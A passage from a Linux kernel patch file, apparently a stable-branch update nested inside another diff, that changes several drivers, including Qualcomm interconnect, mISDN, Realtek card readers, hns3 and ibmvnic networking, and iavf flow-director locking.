+@@ -1349,6 +1350,7 @@ static struct qcom_icc_bcm bcm_ce0 = {
+ 
+ static struct qcom_icc_bcm bcm_cn0 = {
+ 	.name = "CN0",
++	.enable_mask = 0x1,
+ 	.keepalive = true,
+ 	.num_nodes = 55,
+ 	.nodes = { &qnm_gemnoc_cnoc, &qnm_gemnoc_pcie,
+@@ -1383,6 +1385,7 @@ static struct qcom_icc_bcm bcm_cn0 = {
+ 
+ static struct qcom_icc_bcm bcm_co0 = {
+ 	.name = "CO0",
++	.enable_mask = 0x1,
+ 	.num_nodes = 2,
+ 	.nodes = { &qxm_nsp, &qns_nsp_gemnoc },
+ };
+@@ -1403,6 +1406,7 @@ static struct qcom_icc_bcm bcm_mm0 = {
+ 
+ static struct qcom_icc_bcm bcm_mm1 = {
+ 	.name = "MM1",
++	.enable_mask = 0x1,
+ 	.num_nodes = 12,
+ 	.nodes = { &qnm_camnoc_hf, &qnm_camnoc_icp,
+ 		   &qnm_camnoc_sf, &qnm_mdp,
+@@ -1445,6 +1449,7 @@ static struct qcom_icc_bcm bcm_sh0 = {
+ 
+ static struct qcom_icc_bcm bcm_sh1 = {
+ 	.name = "SH1",
++	.enable_mask = 0x1,
+ 	.num_nodes = 7,
+ 	.nodes = { &alm_gpu_tcu, &alm_sys_tcu,
+ 		   &qnm_nsp_gemnoc, &qnm_pcie,
+@@ -1461,6 +1466,7 @@ static struct qcom_icc_bcm bcm_sn0 = {
+ 
+ static struct qcom_icc_bcm bcm_sn1 = {
+ 	.name = "SN1",
++	.enable_mask = 0x1,
+ 	.num_nodes = 4,
+ 	.nodes = { &qhm_gic, &qxm_pimem,
+ 		   &xm_gic, &qns_gemnoc_gc },
+@@ -1492,6 +1498,7 @@ static struct qcom_icc_bcm bcm_sn7 = {
+ 
+ static struct qcom_icc_bcm bcm_acv_disp = {
+ 	.name = "ACV",
++	.enable_mask = 0x1,
+ 	.num_nodes = 1,
+ 	.nodes = { &ebi_disp },
+ };
+@@ -1510,6 +1517,7 @@ static struct qcom_icc_bcm bcm_mm0_disp = {
+ 
+ static struct qcom_icc_bcm bcm_mm1_disp = {
+ 	.name = "MM1",
++	.enable_mask = 0x1,
+ 	.num_nodes = 3,
+ 	.nodes = { &qnm_mdp_disp, &qnm_rot_disp,
+ 		   &qns_mem_noc_sf_disp },
+@@ -1523,6 +1531,7 @@ static struct qcom_icc_bcm bcm_sh0_disp = {
+ 
+ static struct qcom_icc_bcm bcm_sh1_disp = {
+ 	.name = "SH1",
++	.enable_mask = 0x1,
+ 	.num_nodes = 1,
+ 	.nodes = { &qnm_pcie_disp },
+ };
+diff --git a/drivers/isdn/mISDN/dsp.h b/drivers/isdn/mISDN/dsp.h
+index fa09d511a8eda..baf31258f5c90 100644
+--- a/drivers/isdn/mISDN/dsp.h
++++ b/drivers/isdn/mISDN/dsp.h
+@@ -247,7 +247,7 @@ extern void dsp_cmx_hardware(struct dsp_conf *conf, struct dsp *dsp);
+ extern int dsp_cmx_conf(struct dsp *dsp, u32 conf_id);
+ extern void dsp_cmx_receive(struct dsp *dsp, struct sk_buff *skb);
+ extern void dsp_cmx_hdlc(struct dsp *dsp, struct sk_buff *skb);
+-extern void dsp_cmx_send(void *arg);
++extern void dsp_cmx_send(struct timer_list *arg);
+ extern void dsp_cmx_transmit(struct dsp *dsp, struct sk_buff *skb);
+ extern int dsp_cmx_del_conf_member(struct dsp *dsp);
+ extern int dsp_cmx_del_conf(struct dsp_conf *conf);
+diff --git a/drivers/isdn/mISDN/dsp_cmx.c b/drivers/isdn/mISDN/dsp_cmx.c
+index 6d2088fbaf69c..1b73af5013976 100644
+--- a/drivers/isdn/mISDN/dsp_cmx.c
++++ b/drivers/isdn/mISDN/dsp_cmx.c
+@@ -1625,7 +1625,7 @@ static u16	dsp_count; /* last sample count */
+ static int	dsp_count_valid; /* if we have last sample count */
+ 
+ void
+-dsp_cmx_send(void *arg)
++dsp_cmx_send(struct timer_list *arg)
+ {
+ 	struct dsp_conf *conf;
+ 	struct dsp_conf_member *member;
+diff --git a/drivers/isdn/mISDN/dsp_core.c b/drivers/isdn/mISDN/dsp_core.c
+index 386084530c2f8..fae95f1666883 100644
+--- a/drivers/isdn/mISDN/dsp_core.c
++++ b/drivers/isdn/mISDN/dsp_core.c
+@@ -1195,7 +1195,7 @@ static int __init dsp_init(void)
+ 	}
+ 
+ 	/* set sample timer */
+-	timer_setup(&dsp_spl_tl, (void *)dsp_cmx_send, 0);
++	timer_setup(&dsp_spl_tl, dsp_cmx_send, 0);
+ 	dsp_spl_tl.expires = jiffies + dsp_tics;
+ 	dsp_spl_jiffies = dsp_spl_tl.expires;
+ 	add_timer(&dsp_spl_tl);
+diff --git a/drivers/misc/cardreader/rts5227.c b/drivers/misc/cardreader/rts5227.c
+index d676cf63a9669..3dae5e3a16976 100644
+--- a/drivers/misc/cardreader/rts5227.c
++++ b/drivers/misc/cardreader/rts5227.c
+@@ -195,7 +195,7 @@ static int rts5227_extra_init_hw(struct rtsx_pcr *pcr)
+ 		}
+ 	}
+ 
+-	if (option->force_clkreq_0)
++	if (option->force_clkreq_0 && pcr->aspm_mode == ASPM_MODE_CFG)
+ 		rtsx_pci_add_cmd(pcr, WRITE_REG_CMD, PETXCFG,
+ 				FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
+ 	else
+diff --git a/drivers/misc/cardreader/rts5228.c b/drivers/misc/cardreader/rts5228.c
+index cfebad51d1d80..f4ab09439da70 100644
+--- a/drivers/misc/cardreader/rts5228.c
++++ b/drivers/misc/cardreader/rts5228.c
+@@ -435,17 +435,10 @@ static void rts5228_init_from_cfg(struct rtsx_pcr *pcr)
+ 			option->ltr_enabled = false;
+ 		}
+ 	}
+-
+-	if (rtsx_check_dev_flag(pcr, ASPM_L1_1_EN | ASPM_L1_2_EN
+-				| PM_L1_1_EN | PM_L1_2_EN))
+-		option->force_clkreq_0 = false;
+-	else
+-		option->force_clkreq_0 = true;
+ }
+ 
+ static int rts5228_extra_init_hw(struct rtsx_pcr *pcr)
+ {
+-	struct rtsx_cr_option *option = &pcr->option;
+ 
+ 	rtsx_pci_write_register(pcr, RTS5228_AUTOLOAD_CFG1,
+ 			CD_RESUME_EN_MASK, CD_RESUME_EN_MASK);
+@@ -476,17 +469,6 @@ static int rts5228_extra_init_hw(struct rtsx_pcr *pcr)
+ 	else
+ 		rtsx_pci_write_register(pcr, PETXCFG, 0x30, 0x00);
+ 
+-	/*
+-	 * If u_force_clkreq_0 is enabled, CLKREQ# PIN will be forced
+-	 * to drive low, and we forcibly request clock.
+-	 */
+-	if (option->force_clkreq_0)
+-		rtsx_pci_write_register(pcr, PETXCFG,
+-				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
+-	else
+-		rtsx_pci_write_register(pcr, PETXCFG,
+-				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_HIGH);
+-
+ 	rtsx_pci_write_register(pcr, PWD_SUSPEND_EN, 0xFF, 0xFB);
+ 
+ 	if (pcr->rtd3_en) {
+diff --git a/drivers/misc/cardreader/rts5249.c b/drivers/misc/cardreader/rts5249.c
+index 91d240dd68faa..47ab72a43256b 100644
+--- a/drivers/misc/cardreader/rts5249.c
++++ b/drivers/misc/cardreader/rts5249.c
+@@ -327,12 +327,11 @@ static int rts5249_extra_init_hw(struct rtsx_pcr *pcr)
+ 		}
+ 	}
+ 
+-
+ 	/*
+ 	 * If u_force_clkreq_0 is enabled, CLKREQ# PIN will be forced
+ 	 * to drive low, and we forcibly request clock.
+ 	 */
+-	if (option->force_clkreq_0)
++	if (option->force_clkreq_0 && pcr->aspm_mode == ASPM_MODE_CFG)
+ 		rtsx_pci_write_register(pcr, PETXCFG,
+ 			FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
+ 	else
+diff --git a/drivers/misc/cardreader/rts5260.c b/drivers/misc/cardreader/rts5260.c
+index 9b42b20a3e5ae..79b18f6f73a8a 100644
+--- a/drivers/misc/cardreader/rts5260.c
++++ b/drivers/misc/cardreader/rts5260.c
+@@ -517,17 +517,10 @@ static void rts5260_init_from_cfg(struct rtsx_pcr *pcr)
+ 			option->ltr_enabled = false;
+ 		}
+ 	}
+-
+-	if (rtsx_check_dev_flag(pcr, ASPM_L1_1_EN | ASPM_L1_2_EN
+-				| PM_L1_1_EN | PM_L1_2_EN))
+-		option->force_clkreq_0 = false;
+-	else
+-		option->force_clkreq_0 = true;
+ }
+ 
+ static int rts5260_extra_init_hw(struct rtsx_pcr *pcr)
+ {
+-	struct rtsx_cr_option *option = &pcr->option;
+ 
+ 	/* Set mcu_cnt to 7 to ensure data can be sampled properly */
+ 	rtsx_pci_write_register(pcr, 0xFC03, 0x7F, 0x07);
+@@ -546,17 +539,6 @@ static int rts5260_extra_init_hw(struct rtsx_pcr *pcr)
+ 
+ 	rts5260_init_hw(pcr);
+ 
+-	/*
+-	 * If u_force_clkreq_0 is enabled, CLKREQ# PIN will be forced
+-	 * to drive low, and we forcibly request clock.
+-	 */
+-	if (option->force_clkreq_0)
+-		rtsx_pci_write_register(pcr, PETXCFG,
+-				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
+-	else
+-		rtsx_pci_write_register(pcr, PETXCFG,
+-				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_HIGH);
+-
+ 	rtsx_pci_write_register(pcr, pcr->reg_pm_ctrl3, 0x10, 0x00);
+ 
+ 	return 0;
+diff --git a/drivers/misc/cardreader/rts5261.c b/drivers/misc/cardreader/rts5261.c
+index b1e76030cafda..94af6bf8a25a6 100644
+--- a/drivers/misc/cardreader/rts5261.c
++++ b/drivers/misc/cardreader/rts5261.c
+@@ -498,17 +498,10 @@ static void rts5261_init_from_cfg(struct rtsx_pcr *pcr)
+ 			option->ltr_enabled = false;
+ 		}
+ 	}
+-
+-	if (rtsx_check_dev_flag(pcr, ASPM_L1_1_EN | ASPM_L1_2_EN
+-				| PM_L1_1_EN | PM_L1_2_EN))
+-		option->force_clkreq_0 = false;
+-	else
+-		option->force_clkreq_0 = true;
+ }
+ 
+ static int rts5261_extra_init_hw(struct rtsx_pcr *pcr)
+ {
+-	struct rtsx_cr_option *option = &pcr->option;
+ 	u32 val;
+ 
+ 	rtsx_pci_write_register(pcr, RTS5261_AUTOLOAD_CFG1,
+@@ -554,17 +547,6 @@ static int rts5261_extra_init_hw(struct rtsx_pcr *pcr)
+ 	else
+ 		rtsx_pci_write_register(pcr, PETXCFG, 0x30, 0x00);
+ 
+-	/*
+-	 * If u_force_clkreq_0 is enabled, CLKREQ# PIN will be forced
+-	 * to drive low, and we forcibly request clock.
+-	 */
+-	if (option->force_clkreq_0)
+-		rtsx_pci_write_register(pcr, PETXCFG,
+-				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
+-	else
+-		rtsx_pci_write_register(pcr, PETXCFG,
+-				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_HIGH);
+-
+ 	rtsx_pci_write_register(pcr, PWD_SUSPEND_EN, 0xFF, 0xFB);
+ 
+ 	if (pcr->rtd3_en) {
+diff --git a/drivers/misc/cardreader/rtsx_pcr.c b/drivers/misc/cardreader/rtsx_pcr.c
+index 32b7783e9d4fa..a3f4b52bb159f 100644
+--- a/drivers/misc/cardreader/rtsx_pcr.c
++++ b/drivers/misc/cardreader/rtsx_pcr.c
+@@ -1326,8 +1326,11 @@ static int rtsx_pci_init_hw(struct rtsx_pcr *pcr)
+ 			return err;
+ 	}
+ 
+-	if (pcr->aspm_mode == ASPM_MODE_REG)
++	if (pcr->aspm_mode == ASPM_MODE_REG) {
+ 		rtsx_pci_write_register(pcr, ASPM_FORCE_CTL, 0x30, 0x30);
++		rtsx_pci_write_register(pcr, PETXCFG,
++				FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_HIGH);
++	}
+ 
+ 	/* No CD interrupt if probing driver with card inserted.
+ 	 * So we need to initialize pcr->card_exist here.
+diff --git a/drivers/mmc/host/moxart-mmc.c b/drivers/mmc/host/moxart-mmc.c
+index 52ed30f2d9f4f..94e9a08bc90e1 100644
+--- a/drivers/mmc/host/moxart-mmc.c
++++ b/drivers/mmc/host/moxart-mmc.c
+@@ -338,13 +338,7 @@ static void moxart_transfer_pio(struct moxart_host *host)
+ 				return;
+ 			}
+ 			for (len = 0; len < remain && len < host->fifo_width;) {
+-				/* SCR data must be read in big endian. */
+-				if (data->mrq->cmd->opcode == SD_APP_SEND_SCR)
+-					*sgp = ioread32be(host->base +
+-							  REG_DATA_WINDOW);
+-				else
+-					*sgp = ioread32(host->base +
+-							REG_DATA_WINDOW);
++				*sgp = ioread32(host->base + REG_DATA_WINDOW);
+ 				sgp++;
+ 				len += 4;
+ 			}
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 576370f89c755..7a3c7a74af04a 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -5839,7 +5839,9 @@ void bond_setup(struct net_device *bond_dev)
+ 
+ 	bond_dev->hw_features = BOND_VLAN_FEATURES |
+ 				NETIF_F_HW_VLAN_CTAG_RX |
+-				NETIF_F_HW_VLAN_CTAG_FILTER;
++				NETIF_F_HW_VLAN_CTAG_FILTER |
++				NETIF_F_HW_VLAN_STAG_RX |
++				NETIF_F_HW_VLAN_STAG_FILTER;
+ 
+ 	bond_dev->hw_features |= NETIF_F_GSO_ENCAP_ALL;
+ 	bond_dev->features |= bond_dev->hw_features;
+diff --git a/drivers/net/dsa/ocelot/felix.c b/drivers/net/dsa/ocelot/felix.c
+index 4faabc4364aa7..2d2c6f941272c 100644
+--- a/drivers/net/dsa/ocelot/felix.c
++++ b/drivers/net/dsa/ocelot/felix.c
+@@ -1606,8 +1606,10 @@ static void felix_teardown(struct dsa_switch *ds)
+ 	struct felix *felix = ocelot_to_felix(ocelot);
+ 	struct dsa_port *dp;
+ 
++	rtnl_lock();
+ 	if (felix->tag_proto_ops)
+ 		felix->tag_proto_ops->teardown(ds);
++	rtnl_unlock();
+ 
+ 	dsa_switch_for_each_available_port(dp, ds)
+ 		ocelot_deinit_port(ocelot, dp->index);
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+index f6ededec5a4fa..69d1549e63a98 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+@@ -458,9 +458,9 @@ static void hns3_dbg_fill_content(char *content, u16 len,
+ 		if (result) {
+ 			if (item_len < strlen(result[i]))
+ 				break;
+-			strscpy(pos, result[i], strlen(result[i]));
++			memcpy(pos, result[i], strlen(result[i]));
+ 		} else {
+-			strscpy(pos, items[i].name, strlen(items[i].name));
++			memcpy(pos, items[i].name, strlen(items[i].name));
+ 		}
+ 		pos += item_len;
+ 		len -= item_len;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+index 248f15dac86ba..61f833d61f583 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+@@ -5854,6 +5854,9 @@ void hns3_external_lb_prepare(struct net_device *ndev, bool if_running)
+ 	if (!if_running)
+ 		return;
+ 
++	if (test_and_set_bit(HNS3_NIC_STATE_DOWN, &priv->state))
++		return;
++
+ 	netif_carrier_off(ndev);
+ 	netif_tx_disable(ndev);
+ 
+@@ -5882,7 +5885,16 @@ void hns3_external_lb_restore(struct net_device *ndev, bool if_running)
+ 	if (!if_running)
+ 		return;
+ 
+-	hns3_nic_reset_all_ring(priv->ae_handle);
++	if (hns3_nic_resetting(ndev))
++		return;
++
++	if (!test_bit(HNS3_NIC_STATE_DOWN, &priv->state))
++		return;
++
++	if (hns3_nic_reset_all_ring(priv->ae_handle))
++		return;
++
++	clear_bit(HNS3_NIC_STATE_DOWN, &priv->state);
+ 
+ 	for (i = 0; i < priv->vector_num; i++)
+ 		hns3_vector_enable(&priv->tqp_vector[i]);
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
+index 726062e512939..5cb8f1818e51c 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
+@@ -110,9 +110,9 @@ static void hclge_dbg_fill_content(char *content, u16 len,
+ 		if (result) {
+ 			if (item_len < strlen(result[i]))
+ 				break;
+-			strscpy(pos, result[i], strlen(result[i]));
++			memcpy(pos, result[i], strlen(result[i]));
+ 		} else {
+-			strscpy(pos, items[i].name, strlen(items[i].name));
++			memcpy(pos, items[i].name, strlen(items[i].name));
+ 		}
+ 		pos += item_len;
+ 		len -= item_len;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 50e956d6c3b25..6af2273f227c2 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -72,6 +72,8 @@ static void hclge_restore_hw_table(struct hclge_dev *hdev);
+ static void hclge_sync_promisc_mode(struct hclge_dev *hdev);
+ static void hclge_sync_fd_table(struct hclge_dev *hdev);
+ static void hclge_update_fec_stats(struct hclge_dev *hdev);
++static int hclge_mac_link_status_wait(struct hclge_dev *hdev, int link_ret,
++				      int wait_cnt);
+ 
+ static struct hnae3_ae_algo ae_algo;
+ 
+@@ -7567,6 +7569,8 @@ static void hclge_enable_fd(struct hnae3_handle *handle, bool enable)
+ 
+ static void hclge_cfg_mac_mode(struct hclge_dev *hdev, bool enable)
+ {
++#define HCLGE_LINK_STATUS_WAIT_CNT  3
++
+ 	struct hclge_desc desc;
+ 	struct hclge_config_mac_mode_cmd *req =
+ 		(struct hclge_config_mac_mode_cmd *)desc.data;
+@@ -7591,9 +7595,15 @@ static void hclge_cfg_mac_mode(struct hclge_dev *hdev, bool enable)
+ 	req->txrx_pad_fcs_loop_en = cpu_to_le32(loop_en);
+ 
+ 	ret = hclge_cmd_send(&hdev->hw, &desc, 1);
+-	if (ret)
++	if (ret) {
+ 		dev_err(&hdev->pdev->dev,
+ 			"mac enable fail, ret =%d.\n", ret);
++		return;
++	}
++
++	if (!enable)
++		hclge_mac_link_status_wait(hdev, HCLGE_LINK_STATUS_DOWN,
++					   HCLGE_LINK_STATUS_WAIT_CNT);
+ }
+ 
+ static int hclge_config_switch_param(struct hclge_dev *hdev, int vfid,
+@@ -7656,10 +7666,9 @@ static void hclge_phy_link_status_wait(struct hclge_dev *hdev,
+ 	} while (++i < HCLGE_PHY_LINK_STATUS_NUM);
+ }
+ 
+-static int hclge_mac_link_status_wait(struct hclge_dev *hdev, int link_ret)
++static int hclge_mac_link_status_wait(struct hclge_dev *hdev, int link_ret,
++				      int wait_cnt)
+ {
+-#define HCLGE_MAC_LINK_STATUS_NUM  100
+-
+ 	int link_status;
+ 	int i = 0;
+ 	int ret;
+@@ -7672,13 +7681,15 @@ static int hclge_mac_link_status_wait(struct hclge_dev *hdev, int link_ret)
+ 			return 0;
+ 
+ 		msleep(HCLGE_LINK_STATUS_MS);
+-	} while (++i < HCLGE_MAC_LINK_STATUS_NUM);
++	} while (++i < wait_cnt);
+ 	return -EBUSY;
+ }
+ 
+ static int hclge_mac_phy_link_status_wait(struct hclge_dev *hdev, bool en,
+ 					  bool is_phy)
+ {
++#define HCLGE_MAC_LINK_STATUS_NUM  100
++
+ 	int link_ret;
+ 
+ 	link_ret = en ? HCLGE_LINK_STATUS_UP : HCLGE_LINK_STATUS_DOWN;
+@@ -7686,7 +7697,8 @@ static int hclge_mac_phy_link_status_wait(struct hclge_dev *hdev, bool en,
+ 	if (is_phy)
+ 		hclge_phy_link_status_wait(hdev, link_ret);
+ 
+-	return hclge_mac_link_status_wait(hdev, link_ret);
++	return hclge_mac_link_status_wait(hdev, link_ret,
++					  HCLGE_MAC_LINK_STATUS_NUM);
+ }
+ 
+ static int hclge_set_app_loopback(struct hclge_dev *hdev, bool en)
+diff --git a/drivers/net/ethernet/ibm/ibmvnic.c b/drivers/net/ethernet/ibm/ibmvnic.c
+index bc97f24b08270..157be4e9be4b7 100644
+--- a/drivers/net/ethernet/ibm/ibmvnic.c
++++ b/drivers/net/ethernet/ibm/ibmvnic.c
+@@ -96,6 +96,8 @@ static int pending_scrq(struct ibmvnic_adapter *,
+ static union sub_crq *ibmvnic_next_scrq(struct ibmvnic_adapter *,
+ 					struct ibmvnic_sub_crq_queue *);
+ static int ibmvnic_poll(struct napi_struct *napi, int data);
++static int reset_sub_crq_queues(struct ibmvnic_adapter *adapter);
++static inline void reinit_init_done(struct ibmvnic_adapter *adapter);
+ static void send_query_map(struct ibmvnic_adapter *adapter);
+ static int send_request_map(struct ibmvnic_adapter *, dma_addr_t, u32, u8);
+ static int send_request_unmap(struct ibmvnic_adapter *, u8);
+@@ -113,6 +115,7 @@ static void ibmvnic_tx_scrq_clean_buffer(struct ibmvnic_adapter *adapter,
+ static void free_long_term_buff(struct ibmvnic_adapter *adapter,
+ 				struct ibmvnic_long_term_buff *ltb);
+ static void ibmvnic_disable_irqs(struct ibmvnic_adapter *adapter);
++static void flush_reset_queue(struct ibmvnic_adapter *adapter);
+ 
+ struct ibmvnic_stat {
+ 	char name[ETH_GSTRING_LEN];
+@@ -1314,8 +1317,8 @@ static const char *adapter_state_to_string(enum vnic_state state)
+ 
+ static int ibmvnic_login(struct net_device *netdev)
+ {
++	unsigned long flags, timeout = msecs_to_jiffies(20000);
+ 	struct ibmvnic_adapter *adapter = netdev_priv(netdev);
+-	unsigned long timeout = msecs_to_jiffies(20000);
+ 	int retry_count = 0;
+ 	int retries = 10;
+ 	bool retry;
+@@ -1336,11 +1339,9 @@ static int ibmvnic_login(struct net_device *netdev)
+ 
+ 		if (!wait_for_completion_timeout(&adapter->init_done,
+ 						 timeout)) {
+-			netdev_warn(netdev, "Login timed out, retrying...\n");
+-			retry = true;
+-			adapter->init_done_rc = 0;
+-			retry_count++;
+-			continue;
++			netdev_warn(netdev, "Login timed out\n");
++			adapter->login_pending = false;
++			goto partial_reset;
+ 		}
+ 
+ 		if (adapter->init_done_rc == ABORTED) {
+@@ -1382,10 +1383,69 @@ static int ibmvnic_login(struct net_device *netdev)
+ 					    "SCRQ irq initialization failed\n");
+ 				return rc;
+ 			}
++		/* Default/timeout error handling, reset and start fresh */
+ 		} else if (adapter->init_done_rc) {
+ 			netdev_warn(netdev, "Adapter login failed, init_done_rc = %d\n",
+ 				    adapter->init_done_rc);
+-			return -EIO;
++
++partial_reset:
++			/* adapter login failed, so free any CRQs or sub-CRQs
++			 * and register again before attempting to login again.
++			 * If we don't do this then the VIOS may think that
++			 * we are already logged in and reject any subsequent
++			 * attempts
++			 */
++			netdev_warn(netdev,
++				    "Freeing and re-registering CRQs before attempting to login again\n");
++			retry = true;
++			adapter->init_done_rc = 0;
++			release_sub_crqs(adapter, true);
++			/* Much of this is similar logic as ibmvnic_probe(),
++			 * we are essentially re-initializing communication
++			 * with the server. We really should not run any
++			 * resets/failovers here because this is already a form
++			 * of reset and we do not want parallel resets occurring
++			 */
++			do {
++				reinit_init_done(adapter);
++				/* Clear any failovers we got in the previous
++				 * pass since we are re-initializing the CRQ
++				 */
++				adapter->failover_pending = false;
++				release_crq_queue(adapter);
++				/* If we don't sleep here then we risk an
++				 * unnecessary failover event from the VIOS.
++				 * This is a known VIOS issue caused by a vnic
++				 * device freeing and registering a CRQ too
++				 * quickly.
++				 */
++				msleep(1500);
++				/* Avoid any resets, since we are currently
++				 * resetting.
++				 */
++				spin_lock_irqsave(&adapter->rwi_lock, flags);
++				flush_reset_queue(adapter);
++				spin_unlock_irqrestore(&adapter->rwi_lock,
++						       flags);
++
++				rc = init_crq_queue(adapter);
++				if (rc) {
++					netdev_err(netdev, "login recovery: init CRQ failed %d\n",
++						   rc);
++					return -EIO;
++				}
++
++				rc = ibmvnic_reset_init(adapter, false);
++				if (rc)
++					netdev_err(netdev, "login recovery: Reset init failed %d\n",
++						   rc);
++				/* IBMVNIC_CRQ_INIT will return EAGAIN if it
++				 * fails, since ibmvnic_reset_init will free
++				 * irq's in failure, we won't be able to receive
++				 * new CRQs so we need to keep trying. probe()
++				 * handles this similarly.
++				 */
++			} while (rc == -EAGAIN && retry_count++ < retries);
+ 		}
+ 	} while (retry);
+ 
+@@ -1397,12 +1457,22 @@ static int ibmvnic_login(struct net_device *netdev)
+ 
+ static void release_login_buffer(struct ibmvnic_adapter *adapter)
+ {
++	if (!adapter->login_buf)
++		return;
++
++	dma_unmap_single(&adapter->vdev->dev, adapter->login_buf_token,
++			 adapter->login_buf_sz, DMA_TO_DEVICE);
+ 	kfree(adapter->login_buf);
+ 	adapter->login_buf = NULL;
+ }
+ 
+ static void release_login_rsp_buffer(struct ibmvnic_adapter *adapter)
+ {
++	if (!adapter->login_rsp_buf)
++		return;
++
++	dma_unmap_single(&adapter->vdev->dev, adapter->login_rsp_buf_token,
++			 adapter->login_rsp_buf_sz, DMA_FROM_DEVICE);
+ 	kfree(adapter->login_rsp_buf);
+ 	adapter->login_rsp_buf = NULL;
+ }
+@@ -4626,11 +4696,14 @@ static int send_login(struct ibmvnic_adapter *adapter)
+ 	if (rc) {
+ 		adapter->login_pending = false;
+ 		netdev_err(adapter->netdev, "Failed to send login, rc=%d\n", rc);
+-		goto buf_rsp_map_failed;
++		goto buf_send_failed;
+ 	}
+ 
+ 	return 0;
+ 
++buf_send_failed:
++	dma_unmap_single(dev, rsp_buffer_token, rsp_buffer_size,
++			 DMA_FROM_DEVICE);
+ buf_rsp_map_failed:
+ 	kfree(login_rsp_buffer);
+ 	adapter->login_rsp_buf = NULL;
+@@ -5192,6 +5265,7 @@ static int handle_login_rsp(union ibmvnic_crq *login_rsp_crq,
+ 	int num_tx_pools;
+ 	int num_rx_pools;
+ 	u64 *size_array;
++	u32 rsp_len;
+ 	int i;
+ 
+ 	/* CHECK: Test/set of login_pending does not need to be atomic
+@@ -5203,11 +5277,6 @@ static int handle_login_rsp(union ibmvnic_crq *login_rsp_crq,
+ 	}
+ 	adapter->login_pending = false;
+ 
+-	dma_unmap_single(dev, adapter->login_buf_token, adapter->login_buf_sz,
+-			 DMA_TO_DEVICE);
+-	dma_unmap_single(dev, adapter->login_rsp_buf_token,
+-			 adapter->login_rsp_buf_sz, DMA_FROM_DEVICE);
+-
+ 	/* If the number of queues requested can't be allocated by the
+ 	 * server, the login response will return with code 1. We will need
+ 	 * to resend the login buffer with fewer queues requested.
+@@ -5243,6 +5312,23 @@ static int handle_login_rsp(union ibmvnic_crq *login_rsp_crq,
+ 		ibmvnic_reset(adapter, VNIC_RESET_FATAL);
+ 		return -EIO;
+ 	}
++
++	rsp_len = be32_to_cpu(login_rsp->len);
++	if (be32_to_cpu(login->login_rsp_len) < rsp_len ||
++	    rsp_len <= be32_to_cpu(login_rsp->off_txsubm_subcrqs) ||
++	    rsp_len <= be32_to_cpu(login_rsp->off_rxadd_subcrqs) ||
++	    rsp_len <= be32_to_cpu(login_rsp->off_rxadd_buff_size) ||
++	    rsp_len <= be32_to_cpu(login_rsp->off_supp_tx_desc)) {
++		/* This can happen if a login request times out and there are
++		 * 2 outstanding login requests sent, the LOGIN_RSP crq
++		 * could have been for the older login request. So we are
++		 * parsing the newer response buffer which may be incomplete
++		 */
++		dev_err(dev, "FATAL: Login rsp offsets/lengths invalid\n");
++		ibmvnic_reset(adapter, VNIC_RESET_FATAL);
++		return -EIO;
++	}
++
+ 	size_array = (u64 *)((u8 *)(adapter->login_rsp_buf) +
+ 		be32_to_cpu(adapter->login_rsp_buf->off_rxadd_buff_size));
+ 	/* variable buffer sizes are not supported, so just read the
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+index fd6d6f6263f66..f544d2b0abdbd 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+@@ -1401,14 +1401,15 @@ static int iavf_add_fdir_ethtool(struct iavf_adapter *adapter, struct ethtool_rx
+ 	if (fsp->flow_type & FLOW_MAC_EXT)
+ 		return -EINVAL;
+ 
++	spin_lock_bh(&adapter->fdir_fltr_lock);
+ 	if (adapter->fdir_active_fltr >= IAVF_MAX_FDIR_FILTERS) {
++		spin_unlock_bh(&adapter->fdir_fltr_lock);
+ 		dev_err(&adapter->pdev->dev,
+ 			"Unable to add Flow Director filter because VF reached the limit of max allowed filters (%u)\n",
+ 			IAVF_MAX_FDIR_FILTERS);
+ 		return -ENOSPC;
+ 	}
+ 
+-	spin_lock_bh(&adapter->fdir_fltr_lock);
+ 	if (iavf_find_fdir_fltr_by_loc(adapter, fsp->location)) {
+ 		dev_err(&adapter->pdev->dev, "Failed to add Flow Director filter, it already exists\n");
+ 		spin_unlock_bh(&adapter->fdir_fltr_lock);
+@@ -1781,7 +1782,9 @@ static int iavf_get_rxnfc(struct net_device *netdev, struct ethtool_rxnfc *cmd,
+ 	case ETHTOOL_GRXCLSRLCNT:
+ 		if (!FDIR_FLTR_SUPPORT(adapter))
+ 			break;
++		spin_lock_bh(&adapter->fdir_fltr_lock);
+ 		cmd->rule_cnt = adapter->fdir_active_fltr;
